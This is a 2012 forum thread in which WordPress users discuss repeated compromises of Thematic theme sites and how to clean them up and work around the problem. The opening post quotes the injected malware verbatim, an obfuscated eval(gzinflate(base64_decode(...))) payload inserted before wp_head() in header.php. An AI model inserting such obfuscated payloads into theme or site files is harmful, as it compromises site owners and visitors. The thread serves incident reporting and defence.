September 4, 2012 at 3:08 pm #1755
So, I’ve got an issue here where a lot of sites that I’ve built using Thematic are being hacked. Different sites, different hosting companies, different everything, including plugins. The only common element that I can find is that each of them is both WordPress and Thematic.
The hack always appears in the exact same place, around line 49 of the thematic/header.php file:
/* The function wp_head() loads Thematic’s stylesheet and scripts. * Calling wp_head() is required to provide plugins and child themes * the ability to insert markup within the <head> tag. */ #c3284d# eval(gzinflate(base64_decode(“JYxLDoMwDAX3lbhD5ANglSVQepFsoshRoGka4centwfEdjQz4uPPUK9+HgsM/kVeliA7eHKru7Elo7M/eQRKyxwllbCkIJso6izg97M5pey+V53G/FE4qKWh53sxUFc9Dg==”))); #/c3284d# wp_head(); ?>
I’ve already emailed the files to Ian and discussed it with him and I’m also continuing to examine all the hacked sites to see if there’s another way that they could have been exploited, but I figured I’d post this here in case any other Thematic users found the same issue happening to them.
To be even clearer, the hack shows up in the header.php file, in the same spot, each and every time – no other files and no other WordPress sites/themes, just the Thematic ones.September 4, 2012 at 4:40 pm #1756
Thanks for reporting this. My guess is, since it appears *between* the comment and the function wp_head(), that the malware simply looks for the wp_head() hook and injects before that. Since that hook is required in wordpress themes, it is guaranteed to be found. And that is the reason you find it in the same spot every time. Which WordPress version and version of Thematic were the sites running?
I honestly doubt that Thematic is the culprit. A quick google finds this info about the
#c3284d#malware network. Apparently is not even specific to wordpress but infects joomla and other CMSes as well. According to that link, the common denominator is that users have used FTP and not SSH to connect to their host. Apparently a ftp client called ProFTPD is definitely vulnerable, but it also can be a case of stolen passwords from FileZilla or another client.
Are you using the same FTP program to connect to these hosts? Are you using plain FTP and not SFTP or SSH? When you cleanup, change all FTP passwords as well as the wordpress users passwords. And see if the hosts are providing secure connections for file uploads.
Of course, if it turns out to be something in Thematic, we will do everything we can to find and patch any security vulnerability. Do report back with your findings.September 4, 2012 at 11:22 pm #1764
Well in the interim I found this little temporary solution:
Temporarily you can hold back this infection by inserting a comment line at the top of the header file, similar to /* wp_head(); wp_head(); */. This will trick the malware into inserting the code into a comment line, and should have no effect on the website. This call will be different for different content management systems, just look immediately below where the offending code keeps appearing, and put that in the comment line instead of wp_head().
I know it’s not a good fix but what has really been messing with me is that if Google crawls the site before I become aware of the malicious code, the site ends up flagged on blocked for days and, needless to say, this does NOTHING good for the site’s reputation.
Here’s what I’m trying as a fix:
/* The function wp_head() loads Thematic’s stylesheet and scripts. * Calling wp_head() is required to provide plugins and child themes * the ability to insert markup within the &lt;head&gt; tag. */ /* wp_head(); wp_head(); */ wp_head(); ?> </head>
Figure throwing in a couple of commented out instances of wp_head() might throw the malware off the trail of fresh, vulnerable code.
The topic ‘thematic/header.php hacked on multiple sites’ is closed to new replies.